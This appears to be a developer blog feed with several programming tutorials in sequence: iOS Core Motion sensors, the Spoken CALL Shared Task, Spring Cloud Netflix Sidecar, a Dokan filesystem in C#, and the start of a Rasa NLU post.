On my way exploring Augmented Reality under iOS, I have come across the Core Motion framework, which provides tools for working with motion- and environment-related data your device captures. There are numerous applications for this kind of information, especially if we are talking about location-based services or any apps which need to be sensitive to their environment. Since, as a mobile developer, you do not necessarily possess a degree in Physics, and math skills have gathered a thick layer of dust by now, let's try to make complicated things more approachable. In today's blog, we are going to talk about the built-in motion sensors and the way you can use them for the good of humanity. Or to build a silly useless app based on a cheesy cartoon, let's see which one it will be.

All kinds of -meters and a -scope.

In this section, we are going to be looking into 5 different kinds of sensors, built into your device and reading motion information while you’re not watching. For one, it’s good to know all the opportunities you have regarding tracking environment-related events, and, secondly, what an excellent ice-breaker for the next social event you’re attending! So let’s dive right in.

Accelerometer

This guy is not a slyish type of sensor, hiding its purpose behind some fancy mixture of Greek and Latin. It is a simple kind of guy, clear about its intentions: just minding its own business, measuring your acceleration here and there. If you know what acceleration is, you basically understand what this sensor is all about. If you don't, that is weird, and I don't think I can help you, so just stop reading and go rethink your life choices.

No, I’m kidding, I can totally help you. Just give me a call, we can talk this out. For the rest of you, we are just going to make one step further towards the understanding of how this sensor works. For this, imagine yourself on a freefall tower ride in an amusement park. The seatbelts are fastened, and you are going up. Since our tower is pretty tall, and the guy in control is really looking forward to his lunch break, you are going up pretty fast, so that you start feeling your body pressing harder on the seat beneath you. Seconds later, you are at the top and getting ready to experience the free fall. Our hungry amusement park employee presses the big red button on the panel in front of him, and you start falling all the way down, floating just a little above your seat. This time, you feel the shoulder harness pressing into your skin, holding you back from lifting up too much. This is what an accelerometer experiences all the time. Well, maybe it’s not that exciting, we’ll never know. But the principle used in the sensor is the same. A body, loosely attached to a moving plate, is going to experience forces, pushing it in the direction, opposite to the movement. By measuring the extent, to which these forces cause the body to move, our sensor is able to tell us, what the acceleration of the plate is. If you are interested in how it looks in real life, you can check this link or this one.

Pedometer

Next up is the pedometer, the favorite sensor of all the fitness junkies. This is the guy who counts the number of steps between your bed and your fridge (because little achievements matter) and celebrates how sporty you are when you take 10,000 steps inside a shopping mall. How does he do that? The answer is a deep understanding of how walking works. Each step we take consists of several phases, in which we tilt and accelerate in different directions and to a different extent. Distinguishing between the sets of movements that constitute a single step allows this sensor to count their total amount. In earlier days, separate mechanical sensors were used to recognize the step pattern. Pedometers inside modern devices usually rely heavily on input data provided by other inertial sensors. They do not measure the motion themselves, and only make sense of the given measurements. This makes our pedometer a software wannabe among the real hardcore hardware sensors we are discussing here. But it allowed you to stare at your monitor for the rest of the day since you've reached your walking goal, so be kind to it.
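If you want to see the idea behind step counting in code, here is a deliberately naive sketch in Python: it simply counts how often the magnitude of the acceleration vector crosses a threshold from below. Real pedometers are much smarter about filtering and pattern matching; the threshold and the sample values below are made up for this illustration:

import math

def count_steps(samples, threshold=11.0):
    """samples: list of (x, y, z) accelerometer readings in m/s^2."""
    steps = 0
    above = False
    for x, y, z in samples:
        magnitude = math.sqrt(x * x + y * y + z * z)
        if magnitude > threshold and not above:
            steps += 1      # rising edge: we just crossed the threshold
            above = True
        elif magnitude <= threshold:
            above = False   # back below the threshold, ready for the next step
    return steps

# Two "bumps" above the threshold result in two counted steps
print(count_steps([(0, 9.8, 0), (1, 12.0, 0), (0, 9.8, 0), (2, 13.0, 1), (0, 9.8, 0)]))  # 2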

Magnetometer

I think we can all imagine, what this one is trying to measure. What is more interesting, is how it goes about the task. To answer this question, we would usually have to talk about electrons, conductors, circuits and voltage and all that jazz. But since I promised to make things simple, let’s take an example of something that is more fun. Like tourists. Tourists are exceptional beings, who manage to get fascinated by a large number of things in a highly limited time. So imagine a place of interest, with an entrance, an exit and a path in between. Let’s say it’s a sea life museum, with all kinds of fish swimming around our tourists in fish tanks, which build an arch around the path. Our tourists would form a large group at the entrance and, the moment the museum opens its doors, a flow of fascinated humans is going to flood all the way up to the exit. They would keep walking, building what looks like a steadily moving queue through the whole museum. This is how electrons are usually portrayed in a circuit, moving along from where there is a whole bunch of them to where there is none.

Usually, the tourists are very busy, keeping their fascination ratio high. This accounts for a steady flow throughout the whole museum. But some things are especially magnetic to them since they would make for a good background on a photo. As a museum manager, we would like to measure, which particular spots are especially magnetic for the tourist (you see where I am going with this?). To do so, we come up with a brilliant idea – a magnetometer. We know, that if some especially magnificent fish is going to swim by on one side of the arched fish tank, the tourists are going to want to make a picture. Instead of building a steady flow in the middle of our path, they are going to get attracted to one side of it, to get their photo and only then pass by. People are heavy, so there is going to be a weight difference between the two sides of the path, which we could measure and translate into the magnetic power of a spot. The stronger the attraction – the more weight difference we will be registering. That’s like tourist attraction management 101. But other than learning how to pursue an alternative career in tourism, you have just figured out the way magnetometers work. Electrons with tiny cameras are getting attracted by magnetic fields, and gather closer to the source of attraction, on one side of the conductor (our path segment). This causes a measurable weight difference between the left and right parts of the conductor (voltage). The whole thing is called the Hall effect, so now you can also google it, and I can move on to the next sensor.

Barometer

Barometers are some commonly used sensors, which you might have come across in real life. Especially if you hang out on ships a lot. Or around people who… like weather, I guess? The purpose of a barometer is to measure atmospheric pressure. They can take many forms, one of the simplest being that of two conjoined glass containers with water inside, only one of which is sealed. The other one is a thin spout which rises above the water level. The atmospheric pressure is measured based on the level of water in the spout.

Now that I’m done paraphrasing the Wikipedia page on barometers we can move to the way the sensor works inside your phone. Instead of containers with water or, god forbid, mercury, a membrane sensitive to pressure is used. The extent, to which it gets distorted is measured to calculate the atmospheric pressure, which causes the deformation. That’s it, I guess barometers are only fascinating to weather people.

Gyroscope

Last but not least is the gyroscope. This is a really fancy one, just look at it. It looks like it belongs on an oak table in the office of some big corporate boss from the early 2000’s. It can do some pretty impressive tricks as well, just check this video out. Instead, it is consigned to oblivion behind the cover of your phone.

Of course, the gyroscope inside your device doesn’t have all these rings orbiting around it in different directions. Instead, it looks a lot like an accelerometer, if you still remember what that was. Only this time, the body is continually moving back and forth (oscillating, if you are in a search for the fancy word of the week). The moment the device is rotated on an axis perpendicular to the plate it is fixated on, it is going to move along the third axis. Because physics. The movement is measured and can be used to calculate the device orientation. To have a picture of the sensor in your head, watch this video.

Up! we go

If you want to get to know Core Motion, learning by doing is the way to go. That is why today we are going to be building a cheesy little app, which uses the accelerometer inside our iPhone to distinguish top from bottom. If this is your first iOS app and you need some help getting started, you should probably make your way through this tutorial first. But if you are far enough in your iOS developer career to be comfortable with creating a new single-screen project in Xcode, you are all set for what's coming up next.

Preparing the UIView

In our app, we want to be able to point upwards in the direction of the sky however the device is rotated. To do so, we need an indicator of some kind. I am using an image, so the first thing I am going to be setting up in my ViewController is a UIImageView object. I do want it to fill my whole screen, so the width and height of the frame are going to correspond to the dimensions of the device screen, and the image itself is going to be placed into that frame with the .scaleAspectFit option. To make the image show, I am going to add it as a subview of the current controller’s view. If we ran our app at this point, we would see a static full-screen image of whatever we’ve chosen to indicate the direction.

class ViewController: UIViewController {
    private var upView: UIImageView!    

    func showUp() {
        let screenSize: CGRect = UIScreen.main.bounds

        upView = UIImageView(frame: CGRect(x: 0, y: 0, width: screenSize.width, height: screenSize.height))
        upView.image = #imageLiteral(resourceName: "bloons")
        upView.contentMode = .scaleAspectFit
        
        self.view.addSubview(upView)
    }
}

Getting CoreMotion updates

The communication with the CoreMotion framework is handled by the CMMotionManager. After creating an instance of this class, we can ask it for the motion updates and even set up the intervals we want to receive the updates in. To get the updates, we need to give our motion manager an OperationQueue to send its data to. This needs to be done in case we are going to be flooded with motion information, so much so that our device stops handling the events occurring in the UI. To prevent this from happening, we could make the motion manager send all the updates to another thread. This way, our app would stay responsive for the user, even though it is receiving a large number of updates in the background. In the simplified example below I am using one and the same queue for both motion information and UI work.

import CoreMotion
class ViewController: UIViewController {
    private var motionManager: CMMotionManager!
    private var upView: UIImageView!

    func setupCoreMotion() {
        motionManager = CMMotionManager()
        motionManager.deviceMotionUpdateInterval = 0.05
        startAsyncDeviceMotionUpdates()
    }

    fileprivate func startAsyncDeviceMotionUpdates() {
        motionManager.startDeviceMotionUpdates(to: OperationQueue.current!, withHandler: {
            (deviceMotion, error) -> Void in
            if(error == nil) {
                self.handleDeviceMotionUpdates(deviceMotion)
            } else {
                // handle error
            }
        })
    }
}

The second parameter our motion manager needs is a method, which will be invoked every time new motion information comes in. At this point, we can also take care of possible errors, which could occur while retrieving data from the sensors. Handling the motion updates is going to be our next task.

Handling the updates

All the motion data we can retrieve is held by a CMDeviceMotion object we receive in each update. All we need to do is figure out the rotation axis we want to be calculating (since there are 3 different directions you can rotate your iPhone in), apply the correct formula and transform our image. Let's take a look at the axes first.

The picture above can be found in Apple documentation and shows how the rotation types are going to be referred to. In this tutorial, we will only cover the rotation on the Z-axis (yaw). This is going to take care of pointing to the sky as long as we are holding our device perpendicular to the ground. You can find the detailed mathematical explanation of the atan2 formula we are applying to calculate yaw, as well as its equivalents for roll and pitch, here.

import CoreMotion
class ViewController: UIViewController {
    private var motionManager: CMMotionManager!
    private var upView: UIImageView!

    fileprivate func handleDeviceMotionUpdates(_ deviceMotion: CMDeviceMotion?) {
        if let gravity = deviceMotion?.gravity {
            let rotationDegrees = atan2(gravity.x, gravity.y) - Double.pi
            rotate(with: rotationDegrees)
        }
    }
    func rotate(with degrees: Double) {
        upView.transform = CGAffineTransform(rotationAngle: CGFloat(degrees))
    }
}

The very last step towards building our mini-app is applying the calculated rotation degrees to the image we added to our screen in the first step. To do so, I am using a CGAffineTransform, first converting the Double value into a CGFloat, which is then passed as an argument when initializing the transformation. Don't forget to wire up both the image creation and the motion manager setup in the viewDidLoad method. This way, all the elements are going to be initialized right after your view has loaded.

class ViewController: UIViewController {
    private var motionManager: CMMotionManager!
    private var upView: UIImageView!

    override func viewDidLoad() {
        super.viewDidLoad()
        showUp()
        setupCoreMotion()
    }
}

That’s it. Build, run and see the result for yourself! Here is what I’ve got:

I hope you’ve enjoyed our little journey into the functionality of CoreMotion and all kinds of sensors your device is stuffed with. Experiment with it for yourself and let’s learn from each other.

Dannynator.

Quickstart: Get ready for 3rd Spoken CALL Shared Task https://craftcoders.app/quickstart-get-ready-for-3rd-spoken-call-shared-task/ Mon, 03 Sep 2018 20:40:20 +0000 https://craftcoders.app/?p=575

These days the Interspeech 2018 conference is taking place, where I'm invited as a speaker, and as they write on their website:

Interspeech is the world’s largest and most comprehensive conference on the science and technology of spoken language processing.

This coming Wednesday the results and systems of the 2nd Spoken CALL Shared Task (ST2) will be presented and discussed in a special session of the conference. Chances are that these discussions will lead to a third edition of the shared task.

With this blog post, I want to address all newcomers and provide a short, comprehensible introduction to the most important challenges you will face if you want to participate in the Spoken CALL Shared Task. If you like "hard fun", take a look at my research group's tutorial paper. There will be unexplained technical terms and many abbreviations combined with academic language in a condensed font for you 🙂

What is this all about?

The Spoken CALL Shared Task aims to create an automated prompt-response system for German-speaking children to learn English. The exercise for a student is to translate a request or sentence into English using voice. The automated system should ideally accept a correct response or reject a student response if faulty and offer relevant support or feedback. There are a number of prompts (given as text in German, preceded by a short animated clip in English), namely to make a statement or ask a question regarding a particular item. A baseline system (def) is provided by the website of the project. The final output of the system should be a judgment call as to the correctness of the utterance. A wide range of answers is to be allowed in response, adding to the difficulty of giving automated feedback. Incorrect responses are due to incorrect vocabulary usage, incorrect grammar, or bad pronunciation and quality of the recording.

How to get started

A day may come when you have to dig into papers to understand how others built their systems, but it is not this day. As someone who is new to the field of natural language processing (NLP) you have to understand the basics of machine learning and scientific work first. Here are the things we will cover with this post:

  1. Machine learning concepts
  2. Running the baseline system
  3. Creating your own system

Machine learning concepts

When my research group and I first started to work on the shared task, we read the papers and understood barely anything. So, we collected all the technical terms we didn't understand and created a dictionary with short explanations. Furthermore, we learned about different concepts you should take a look at:

Training data usage

For the 2nd edition, there was a corpus (= training data) containing 12,916 data points (in our case speech utterances) that we can use to create a system. A machine learning algorithm needs training data to extract features from it. These features can be used for classification, and the more varied data you have, the better the classification will be.


But you can’t use all that data for training. You have to keep a part of your data points aside so you can validate that your system can classify data it has never seen before. This is called validation set and the other part is called training set. A rookie mistake (which we made) is to use the test set as validation set. The test set is a separate corpus, which you should use at the very end of development only to compare your system with others. For a more detailed explanation take a look at this blog post.

If you don’t have a separate validation set (like in our case) you can use cross-validation instead, which is explained here. Furthermore, you should try to have an equal distribution between correct and incorrect utterances in your sets. If this is not the case, e.g. if you have 75% correct utterances and 25% incorrect utterances in your training set, your system will tend to accept everything during validation.

Metrics

Metrics are used to measure how well a system performs. They are based on the system's results, which are generally displayed as a confusion matrix:

 

  • TP: True positive (a correct utterance has been classified as correct)
  • FP: False positive (a faulty utterance has been classified as correct)
  • TN: True negative (a faulty utterance has been classified as incorrect)
  • FN: False negative (a correct utterance has been classified as incorrect)

Based on the confusion matrix there are four commonly used metrics: accuracy, precision, recall and F1. When to use which is explained thoroughly here. For the shared task, there's a special metric called D-score. It is used to evaluate the system's performance with respect to a bias that penalizes different classification mistakes differently. More details about the D-score can be found in our tutorial paper.
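As a small Python sketch (not official shared-task code), here is how the four standard metrics fall out of the confusion matrix; the D-score is task-specific and defined in the shared-task material, so it is left out on purpose:

def metrics(tp: int, fp: int, tn: int, fn: int) -> dict:
    accuracy = (tp + tn) / (tp + fp + tn + fn)
    precision = tp / (tp + fp) if (tp + fp) else 0.0
    recall = tp / (tp + fn) if (tp + fn) else 0.0
    f1 = 2 * precision * recall / (precision + recall) if (precision + recall) else 0.0
    return {"accuracy": accuracy, "precision": precision, "recall": recall, "f1": f1}

# Example with made-up numbers: 80 TP, 20 FP, 70 TN, 30 FN
print(metrics(tp=80, fp=20, tn=70, fn=30))
# {'accuracy': 0.75, 'precision': 0.8, 'recall': 0.727..., 'f1': 0.761...}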

Running the baseline system

If you open the data download page you can see an important differentiation: on the one hand you can download the speech processing system (also called the ASR system or Kaldi system), and on the other hand you can download the text processing system. Basically, you have two independent baseline systems you can work on.

For the ASR system to work you have to install several applications. This is one of the pain points, so be careful here! Kaldi is the speech processing framework our baseline system is built on. The things you need for Kaldi are Python, TensorFlow, CUDA, and cuDNN. The latter two are for Nvidia graphics cards. cuDNN depends on CUDA, so check that the versions you install match. Furthermore, Kaldi and TensorFlow should be able to use the installed Nvidia software versions. To find out if everything went well you can try Kaldi's yes/no example as described in:

kaldi/egs/yesno/README.md

The text processing system can be run using just Python and is pretty minimal 😉 At least it was during ST2. You can either check if there's a new official baseline system for text processing, or you can use one of our CSU-K systems as a basis:

https://github.com/Snow-White-Group/CSU-K-Toolkit

Creating your own system

To create your own system you first have to decide whether you want to start with text or speech processing. If you are a complete beginner in the field, I would advise you to start with text processing because it is easier. If you want to start with speech processing, take a look at Kaldi for Dummies, which will teach you the basics.

The Kaldi system takes the training data audio files as input and produces text output which looks like this:

user-008_2014-05-11_17-57-14_utt_015 CAN I PAY BY CREDIT CARD 
user-023_2014-11-03_09-47-09_utt_009 I WANT A COFFEE 
user-023_2014-11-03_09-47-09_utt_010 I WOULD LIKE A COFFEE 
user-023_2014-11-03_09-47-09_utt_011 I WANT THE STEAK 

The ASR output can be used as input for the text processing system, which produces a classification (language: correct/incorrect, meaning: correct/incorrect) for the given sentence as output.
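To make the hand-over between the two systems tangible, here is a tiny Python sketch. The file name and the classify() logic are made up; the real text processing system is exactly the part you have to build yourself:

def parse_asr_line(line: str) -> tuple:
    utt_id, transcript = line.strip().split(maxsplit=1)
    return utt_id, transcript

def classify(transcript: str) -> dict:
    # Placeholder: accept everything. A real system checks language and meaning.
    return {"language": "correct", "meaning": "correct"}

with open("asr_output.txt") as f:  # hypothetical file containing the ASR output shown above
    for line in f:
        utt_id, transcript = parse_asr_line(line)
        print(utt_id, classify(transcript))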

Now you should be at a point where you understand most of the things described in the papers, except for the concrete architectures and algorithms used. Read through them to collect ideas and dig deeper into the things that seem interesting to you 🙂 Furthermore, here are some keywords you should have heard of:

  • POS Tagging, dependency parsing
  • NER Tagging
  • Word2Vec, Doc2Vec
  • speech recognition
  • information retrieval

I hope you are motivated to participate and if so, see you at the next conference 🙂

Greets,

Domi

Spring Cloud Netflix Sidecar Tutorial https://craftcoders.app/spring-cloud-netflix-sidecar-tutorial/ Mon, 20 Aug 2018 21:38:21 +0000 https://craftcoders.app/?p=538

Introduction

Hey guys,
this week’s post is about Microservices created with the various Spring Cloud frameworks and how to include services written in non-JVM programming languages into the Spring Cloud ecosystem using Spring Cloud Netflix Sidecar. Please be aware that this tutorial is specifically written for people who know the architectural style of Microservices and are creating applications using the various Spring Cloud frameworks or plan to do so.

If you don’t know what Microservices are, please read the excellent blog post from Martin Fowler regarding Microservices. Basically every book, article or scientific paper (and my bachelor thesis) about this architectural style is based on this blog post, so yeah, it’s a pretty good read.


The problem I faced

I am currently in the process of writing my bachelor thesis and therefore implemented a prototypical application using the Microservice architectural style. Because I'm a Java guy and know the Spring framework, I decided to implement the application using the Spring Cloud ecosystem. I use a Eureka server as a service registry. Furthermore, I implemented several Spring Boot services and was able to register them with Eureka with the use of an annotation and a little bit of configuration.

It turned out that I had to implement one of the services making up my application in PHP (yikes!) because a library I had to use is not available in Java. Because I only had two weeks for the implementation of my prototype, I certainly wouldn't have been able to write a Java implementation of the library. Therefore I decided to create a PHP microservice with the help of Lumen.

Furthermore I didn’t want to miss out on the fancy features of my service registry like client-side load-balancing and the decoupling of my service providers from my consumers. After a bit of research I found the documentation of the Eureka HTTP API. I got discouraged at the sight of the XSD I had to implement in my PHP service to register it with Eureka. I really did not want to implement the various REST operations manually into my service because my PHP knowledge is very limited and I have never used Lumen before.

I was on the verge of giving up when I found Spring Cloud Netflix Sidecar. It promised to let me register my service written in PHP with Eureka using one annotation and a little configuration, just like in my other services written with Spring boot.


Spring Cloud Netflix Sidecar

Spring Cloud Netflix Sidecar is a subproject of Spring Cloud Netflix and is inspired by the Netflix Prana project. A sidecar service is basically yet another Spring Boot application that runs on the same host as your non-JVM service. It registers itself with your service registry under a defined application name and frequently checks the health of your non-JVM service via a REST call. The sidecar is also able to forward calls from other services of your application. By using a sidecar application you only have to make minimal changes to your non-JVM application, so it's also great for legacy projects.


A working example

For you to get the hang of Spring Cloud Netflix Sidecar, I created a very minimalistic project consisting of a Eureka server, a Lumen service capable of doing nothing and the corresponding sidecar application. You have to have Docker and docker-compose installed to run this example. In order to run the example application, clone the project from our GitHub repository. After that, change into its directory and type docker-compose up -d into your console. This command pulls all necessary images from our DockerHub registries and starts the containers. After everything has started, you can access http://localhost:8761/, which is the Eureka dashboard, and see the lumen service registered.

You can stop the container containing the lumen service by typing docker stop *lumen-service* and the status of the application on your Eureka dashboard should change to DOWN a few seconds later. That is because the sidecar application’s heartbeats are not answered by your lumen service, obviously.


How to set this up

Sadly, sidecar isn’t available in Spring Initializr, so you have to manually add following maven dependency to your Spring Boot application:

<dependency>
    <groupId>org.springframework.cloud</groupId>
    <artifactId>spring-cloud-netflix-sidecar</artifactId>
</dependency>

After adding the dependency you can annotate your main class with the @EnableSidecar annotation.

It would not be a proper Spring application if you didn't have to create an application.yml and add all the necessary configuration, so let's do this.

server:
  port: 5678

spring:
  application:
    name: lumen-service

eureka:
  client:
    serviceUrl:
      defaultZone: ${EUREKA_URI:http://localhost:8761/eureka}
  instance:
    preferIpAddress: true

sidecar:
  port: ${SIDECAR_PORT:8000}
  health-uri: ${SIDECAR_HEALTH_URI:http://localhost:8000/health}

We have to tell the sidecar application on which port to run and what its name is. Note that the spring.application.name property is the one that gets displayed on your Eureka dashboard. Furthermore, we have to tell the application where the registry server is located.

The important configuration properties are:

  • sidecar.port: This is the port your non-JVM application is listening on.
  • sidecar.health-uri: This is the REST endpoint of your non-JVM application where you implemented a health check.

The configured health check REST endpoint should return a JSON document looking like this:

{
   "status": "UP"
}


Implementing such a simple health check in Lumen is pretty easy: just add the following code snippet to your web.php, located in the routes folder of your project:

$router->group(['prefix' => 'health'], function () use ($router) {

    $router->get('', function () {
        return response()->json(['status' => 'UP']);
    });

});

And that’s all you have to change in your non-JVM application to get all the advantages of the Spring Cloud ecosystem.


Roundup

In this post I showed you how to include a non-JVM application in your Spring Cloud ecosystem. This can be done by creating a Spring Boot application with the sidecar dependency and some configuration, and adding a simple health check to your service.


I hope I was able to help some people with this post!

Best regards

Leon

Do it yourself filesystem with Dokan https://craftcoders.app/do-it-yourself-filesystem-with-dokan/ Mon, 13 Aug 2018 08:00:00 +0000 https://craftcoders.app/?p=498

What's up guys?! A week has passed and it's time for a new blog post. This time I am gonna give you a small introduction to Dokan. You don't have a clue? Never heard of Dokan before? No problem… I hadn't either. But in the life of a student there comes the moment where one must write his bachelor thesis, no matter how much you procrastinate. As part of my thesis, I had to write a filesystem, and this is exactly where Dokan came into play to save my ass.

WHAT IN THE HELL IS DOKAN?!

So let’s start from the beginning. As I mentioned before, I had to implement my own Filesystem. Yeah, basically you could write your own filesystem driver. But that would be like writing a compiler to print a simple “Hello World”. But there is a really cool concept which is heavily used in the Linux world. Its called FUSE (Filesystem in Userspace). With FUSE everyone is able to create their own Filesystem without writing a Kernel component. FUSE empowers you to write a Filesystem in the same manner as a user-mode application. So what is Dokan?! Dokan is simply FUSE for Windows. It is as simple as that. You could even use Dokan to run a filesystem which has been written with FUSE under windows.

Okay cool… How does this magic work?!

So you are right: without a kernel component, there is no way to implement a filesystem. But you don't have to write it, because Dokan did. Dokan ships with two components: (1) dokan1.sys, alias the "Dokan File System Driver", and (2) dokan1.dll, which is used in a "Filesystem Application". Take a look at the picture below.

First, a random application is running. It could be Word, Visual Studio, IntelliJ or your web browser rendering a website that is trying to write a virus into a file. Let's assume it is the web browser. If the web browser tries to write some content x to a file y, it's gonna fire an I/O request.
This I/O request is processed by the Windows I/O Subsystem. Note that by passing the I/O request to the Windows I/O Subsystem we leave the user mode and enter the kernel mode of Windows (this is 1 in the picture above).

Secondly, the Windows I/O Subsystem will delegate the I/O request to the driver responsible for the filesystem. In our case that would be the Dokan File System Driver, which is dokan1.sys. Please note that we did not write any code for that driver; it just needs to be installed (this is 2 in the picture above).

Third, our Filesystem Application, which has registered itself with the Dokan File System Driver, gets notified about the I/O request. By implementing the interface that comes with dokan1.dll, our Filesystem Application is now responsible for processing the I/O request. Whatever has to be done needs to be done by our Filesystem Application. And as you might already guess: yes, this is the part we need to write! The Filesystem Application then invokes a callback function and the Dokan File System Driver is back in line (this is 3-4 in the picture).

Last but not least, the Dokan File System Driver receives the I/O response created by our Filesystem Application and invokes the callback routine of the Windows I/O Subsystem. The Windows I/O Subsystem then forwards the result to the application which created the I/O request. In our case, the web browser with the porno site (this is 5-6 in the picture).

Just do it! Writing a simple Filesystem

Scope

Okay, we are actually not going to implement a complete filesystem. That would be too much for a blog post. We are doing something simple: let's create a filesystem that contains a fake file which can be read with an editor.

Warmup: Preparations

As I already mentioned before, we need to install the Dokan File System Driver. It is used as a proxy for our Filesystem Application. You can get the latest version here.
As soon as we have the Dokan File System Driver installed, we can create a blank C# console application. Please note that you could also use Dokan with other languages. As always, you can find my solution on GitHub. After we've created the console application, which will be our Filesystem Application, we need to add the Dokan library (dokan1.dll). Luckily there is a NuGet package.
Everything settled? Let the game begin!

Mount the FS

First of all, we need to implement the IDokanOperations interface from dokan1.dll. Since this is for learning purposes, I didn't create a second class, so everything is in one class. In the Main() method I create a new instance of the class and mount the filesystem.

static void Main(string[] args)
{
    var m = new StupidFS();
    // mounting point, dokan options, num of threads
    m.Mount("s:\\", DokanOptions.DebugMode, 5);
}

1..2..3.. and it crashed! What happened? As you can see from the console output, several I/O requests failed. First the GetVolumeInformation operation failed and then the Mounted operation. They failed because we have not implemented them yet. But it's simple: in the GetVolumeInformation request we just need to provide some information for the OS. Basically, this is just some meta information about our filesystem, like its name, how long a path can get and which features it supports. Let's implement it:

[...]

public NtStatus GetVolumeInformation(...)
{
       volumeLabel = "CraftCode Crew";
       features = FileSystemFeatures.None;
       fileSystemName = "CCCFS";
       maximumComponentLength = 256;

       return DokanResult.Success;
}

[...] 

public NtStatus Mounted(DokanFileInfo info)
{
       return DokanResult.Success;
}

But it won't work yet. We also need to "implement" the CreateFile method:

public NtStatus CreateFile(...)
{
      return DokanResult.Success;
}

Did you notice how every method returns an NtStatus? This status indicates whether a request has failed (and why) or succeeded. You might wonder why we need to return Success in the CreateFile method just for mounting the filesystem: as soon as we mount the filesystem, the OS immediately opens a few files on the new volume. If we throw an exception there, our filesystem ends up in a bad state.

Faking a file

Whenever the filesystem has to list files, there are two possible requests: FindFilesWithPattern and FindFiles. Luckily, we just need to implement one and suppress the other. We are going to implement the FindFiles method; therefore we return DokanResult.NotImplemented in FindFilesWithPattern, so whenever the filesystem gets this request it is rerouted to FindFiles.
One of the parameters of FindFiles is a list of FileInformation objects. We are just going to fake a single item, add it to a list and assign that list to the files parameter.

public NtStatus FindFilesWithPattern(...)
{
   files = null;

   return DokanResult.NotImplemented;
}

public NtStatus FindFiles(...)
{
   var fileInfo = new FileInformation
   {
         FileName = "carftCodeCrew.txt",
         CreationTime = DateTime.Now,
         LastAccessTime = DateTime.Now,
         LastWriteTime = DateTime.Now,
         Length = FileContent.Length, // size in bytes (one byte per ASCII character)
   };

   files = new List<FileInformation> {fileInfo};

   return DokanResult.Success;
}

And we did it! Our filesystem now shows one file!
Did you notice FileContent? It's just a global string containing the content of our text file.
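In case you want to follow along, a minimal declaration could look like this; the actual text is just an assumed example value:

// assumed example value: the content of our fake text file
private const string FileContent = "Hello from the CraftCode Crew!";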

Reading with the good old Editor

Let's read data from our filesystem! We want to read the string FileContent with the good old Editor (Notepad). So, first of all, we need to make changes to the CreateFile method. Whenever a file or directory is opened, the CreateFile method gets invoked. We need to provide the DokanFileInfo object with a context. In the case of a read operation, the context is a stream where the data is located. Since we want to read a string, we are going to use a MemoryStream.

public NtStatus CreateFile(...)
{
     if (fileName.Equals(@"\carftCodeCrew.txt"))
     {
       info.Context = new MemoryStream(System.Text.Encoding.ASCII.GetBytes(FileContent));
     }

       return DokanResult.Success;
}
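One thing to keep in mind: this is a deliberately minimal sketch. A real filesystem would also want to dispose the stream again once the handle is released (IDokanOperations has Cleanup and CloseFile callbacks for that) and return an error such as DokanResult.FileNotFound for unknown paths instead of blindly returning Success.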

We are close, but not quite there. When an application like the Editor tries to open a file it also wants to read the file's meta information, for example to set the window title. Therefore we need to implement the GetFileInformation method. Since our filesystem has just one file, this is really trivial:

public NtStatus GetFileInformation(...)
{
     fileInfo = new FileInformation
     {
            FileName = "carftCodeCrew.txt",
            Attributes = 0,
            CreationTime = DateTime.Now,
            LastAccessTime = DateTime.Now,
            LastWriteTime = DateTime.Now,
             Length = FileContent.Length, // size in bytes, same as in FindFiles
     };

     return DokanResult.Success;
}

Now we are really close! We just need to implement the ReadFile method. In this method, we get the stream from DokanFileInfo.Context and then read the bytes that have been requested. It is really as simple as that.

public NtStatus ReadFile(...)
{
      bytesRead = 0;

      if (info.Context is MemoryStream stream)
      {
          stream.Position = offset;
          bytesRead = stream.Read(buffer, 0, buffer.Length);
      }

      return DokanResult.Success;
}

The lovely CraftCodeCrewFS

Rasa Core & NLU: Conversational AI for dummies https://craftcoders.app/rasa-core-nlu-conversational-ai-for-dummies/ Mon, 23 Jul 2018 10:47:42 +0000 https://craftcoders.app/?p=395 AI is a sought-after topic, but most developers face two hurdles that prevent them from programming anything with it.

  1. It is a complex field in which a lot of experience is needed to achieve good results
  2. Although there are good network topologies and models for a problem, there is often a lack of training data (corpora) without which most neural networks cannot achieve good results

Especially in the up-and-coming natural language processing (NLP) sector, there is a lack of data in many areas. With this blog post we are going to discuss a simple yet powerful solution to address this problem in the context of a conversational AI.

Leon presented a simple solution on our blog a few weeks ago: with AI as a Service, reliable language processing systems can be developed in a short time without having to hassle around with datasets and neural networks. However, there is one significant drawback to this type of technology: dependence on the operator of the service. On the one hand the service may come with costs; on the other hand your own, possibly sensitive, data has to be passed on to the service operator. Especially for companies this is usually a show stopper. That's where Rasa enters the stage.

The Rasa Stack

Rasa is an open source (see Github) conversational AI that is fully free for everyone and can be used in-house. There is no dependence on a service from Rasa or any other company. It consists of a two-part stack whose individual parts seem to perform similar tasks at first glance, but on closer inspection each solves its own problem. Rasa NLU is the language understanding AI we are going to dig deeper into soon. It is used to understand what the user is trying to say and which additional information they provide. Rasa Core is the context-aware AI for conversational flow, which is used to build dialog systems, e.g. chatbots like this. It uses the information from Rasa NLU to find out what the user wants and what other information is needed to achieve it. For example, for a weather report you need both the date and the place.

Digging deeper into Rasa NLU

The following paragraphs deal with the development of language understanding. Its basics are already extensively documented, which is why I will keep that part brief and instead present the optimization possibilities in more detail. If you have never coded anything with Rasa, it makes sense to work through the restaurant example (see also the Github code template) to get a basic understanding of the framework.

The processing pipeline is the core element of Rasa NLU. The decisions you make there have a huge influence on the system's quality. In the restaurant example the pipeline is already given: the two NLU frameworks spaCy and scikit-learn are used for text processing. Good results can be achieved with very little domain-specific training data (10-20 formulations per intent), and you can collect this amount of data easily using the Rasa Trainer. The required amount is so small because transfer learning combines your own training data with spaCy's own high-quality models to create a neural net. Besides spaCy, there are other ways to process your data, which we will discover now!
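But before we move on, here is a quick impression of what 10-20 formulations per intent could look like. This is a hand-written sketch in Rasa NLU's Markdown training data format, where entities are annotated as [value](entity_name); the sentences are made up and would have to be replaced with formulations from your own domain:

## intent:restaurant_search
- I am looking for [Chinese](cuisine) food
- show me [italian](cuisine) restaurants
- is there a good [sushi](cuisine) place nearby?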

Unlock the full potential

Instead of spaCy you can also use MIT Information Extraction (MITIE). MITIE can likewise be used for intent recognition and named entity recognition (NER). Both backends perform the same tasks and are therefore interchangeable; the difference lies in the algorithms and models they use. You are also not bound to spaCy or MITIE alone: you can, for example, use scikit-learn for intent classification.

Which backend works best for your project depends on your use case and should be tested. As you will see in the next paragraph, the pipeline offers some components that work particularly well. The cross-validation that already ships with Rasa NLU should be used to evaluate the quality of the system.

The processing pipeline

You should understand how the pipeline works in order to develop a good system for your specific problem.

